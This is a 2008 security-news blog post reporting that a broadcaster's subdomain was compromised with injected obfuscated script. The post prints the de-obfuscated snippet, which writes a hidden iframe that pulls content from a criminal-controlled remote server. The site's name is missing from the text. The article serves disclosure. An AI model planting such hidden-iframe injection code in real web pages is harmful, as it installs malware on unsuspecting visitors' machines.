Daily cyber threats and internet security news: network security, online safety and latest security alerts
November 27th, 2008 Subdomain Compromised, Installing Malware On Visitors PC’s

Once again legitimate website was infected with malicious obfuscated code, this time it was It seems popular sites with very high traffic remain a favorite and highly effective attack vector for hackers.

Today Finjan has revealed that the subdomain of a famous radio and television network,, was compromised as a result of malicious activity. The cybercriminals added a malicious obfuscated script to the infected page. The injected script added a malicious IFrame to the page.

The injected IFrame automatically loads another malicious script from a remote server controlled by criminals in Russia, causing a possible installation of malware on the unsuspecting client machine. De-obfuscated script code from sub-domain:

<SCRIPT> window.status=’Done’; document.write(‘<iframe name=29dee5c6 src=’http://[REMOVED]/.if/go.html?’ +Math.round(Math.random()*257224)+’3e78’ width=632 height=407 style=’display: none’></iframe>’) </SCRIPT>

The malicious Russian server, from which the IFrame pulled the malicious code located in Saint Petersburg, hosted by “ZAO National Telecomunications ISP”.

Finjan immediately informed of the infection and currently the remote Russian server is down.

Share this item with others:

More on CyberInsecure:
  • International Electrotechnical Commission Website Compromised, Redirect Exploits Internet Explorer, QuickTime And AOL SuperBuddy
  • Phishing Botnet Expands By SQL Injecting Websites Found In Google
  • US Treasury Department Websites Infect Visitors With Malware
  • Texas National Guard Website Remains Unavailable After Malware Infection
  • Fake iPhone Unlocking App Changes DNS And Hijacks Internet Connection

  • If you found this information useful, consider linking to it from your own website.
    Just copy and paste the code below into your website (Ctrl+C to copy)
    It will look like this: Subdomain Compromised, Installing Malware On Visitors PC’s

    Leave a Reply

    Comments with unsolicited links to other resources will be marked as spam. DO NOT leave links in comments. Please leave your real email, it wont be published.

    To prove you’re a person (not a spam script), type the security word shown in the picture. Click on the picture to hear an audio file of the word.